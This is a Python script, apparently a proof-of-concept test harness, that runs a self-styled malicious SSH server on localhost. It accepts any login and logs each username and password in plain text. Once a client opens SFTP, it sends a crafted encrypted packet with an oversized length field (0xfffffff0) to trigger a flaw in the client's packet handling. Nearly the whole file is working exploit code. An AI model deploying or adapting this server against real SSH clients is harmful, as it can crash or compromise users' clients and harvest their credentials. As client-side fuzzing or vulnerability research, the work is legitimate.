#!/usr/bin/env python3
import argparse
import asyncio
import asyncssh
import base64
import hashlib
from asyncssh.packet import UInt32

p = argparse.ArgumentParser()
p.add_argument('--port', type=int, required=True)
p.add_argument('--ready-file', required=True)
p.add_argument('--log', required=True)
p.add_argument('--fingerprint-file', required=True)
a = p.parse_args()

logf = open(a.log, 'w', buffering=1, encoding='utf-8')
def note(m):
    print(m, file=logf, flush=True)

host_key = asyncssh.generate_private_key('ssh-rsa')
pub = host_key.export_public_key().decode().strip()
blob = base64.b64decode(pub.split()[1])
fp = base64.b64encode(hashlib.sha256(blob).digest()).decode()
with open(a.fingerprint_file, 'w', encoding='utf-8') as f:
    f.write(fp + '\n')

class Sess(asyncssh.SSHServerSession):
    def __init__(self, srv):
        self.srv = srv
    def connection_made(self, chan):
        note('session channel made')
    def subsystem_requested(self, subsystem):
        note(f"subsystem_requested subsystem={subsystem!r}")
        return subsystem == 'sftp'
    def session_started(self):
        note('session_started; SFTP subsystem accepted; scheduling malformed encrypted packet')
        asyncio.create_task(self.srv.inject())
    def data_received(self, data, datatype):
        note(f"data_received len={len(data)} first_bytes={data[:20]!r}")
    def connection_lost(self, exc):
        note(f"session connection_lost exc={exc!r}")

class Server(asyncssh.SSHServer):
    def __init__(self):
        self.conn = None
        self.injected = False
    def connection_made(self, conn):
        self.conn = conn
        note(f"accepted TCP client peer={conn.get_extra_info('peername')!r}")
    def begin_auth(self, username):
        note(f"begin_auth username={username!r}")
        return True
    def password_auth_supported(self):
        note('password_auth_supported')
        return True
    def validate_password(self, username, password):
        note(f"validate_password username={username!r} password={password!r}")
        return True
    def auth_completed(self):
        note('auth_completed')
    def session_requested(self):
        note('session_requested accepted')
        return Sess(self)
    async def inject(self):
        if self.injected:
            return
        self.injected = True
        conn = self.conn
        for _ in range(300):
            if getattr(conn, '_send_encryption', None) is not None:
                break
            await asyncio.sleep(0.02)
        seq = getattr(conn, '_send_seq', 0)
        enc = getattr(conn, '_send_encryption', None)
        note(f"injecting packet reason=after-sftp-subsystem seq={seq} encryption={type(enc).__name__}")
        clear_packet_length = 0xfffffff0
        clear_header = UInt32(clear_packet_length)
        clear_body = b'\x04' + (b'P' * 31)
        packet, mac = enc.encrypt_packet(seq, clear_header, clear_body)
        conn._send(packet + mac)
        conn._send_seq = (seq + 1) & 0xffffffff
        note(f"sent encrypted malformed packet seq={seq} clear_packet_length=0x{clear_packet_length:08x} body_len={len(clear_body)} wire_len={len(packet)+len(mac)}")
        await asyncio.sleep(2.0)
        try:
            conn.abort()
            note('aborted connection after injection window')
        except Exception as exc:
            note(f'abort failed: {exc!r}')
    def connection_lost(self, exc):
        note(f"server connection_lost exc={exc!r}")

async def main():
    server = await asyncssh.create_server(
        Server,
        '127.0.0.1',
        a.port,
        server_host_keys=[host_key],
        encryption_algs=['chacha20-poly1305@openssh.com'],
        kex_algs=['curve25519-sha256'],
        compression_algs=['none'],
        password_auth=True,
        public_key_auth=False,
        allow_scp=False,
    )
    note(f"malicious SSH server listening on 127.0.0.1:{a.port}")
    with open(a.ready_file, 'w', encoding='utf-8') as f:
        f.write('ready\n')
    await asyncio.sleep(30)
    server.close()
    await server.wait_closed()

asyncio.run(main())
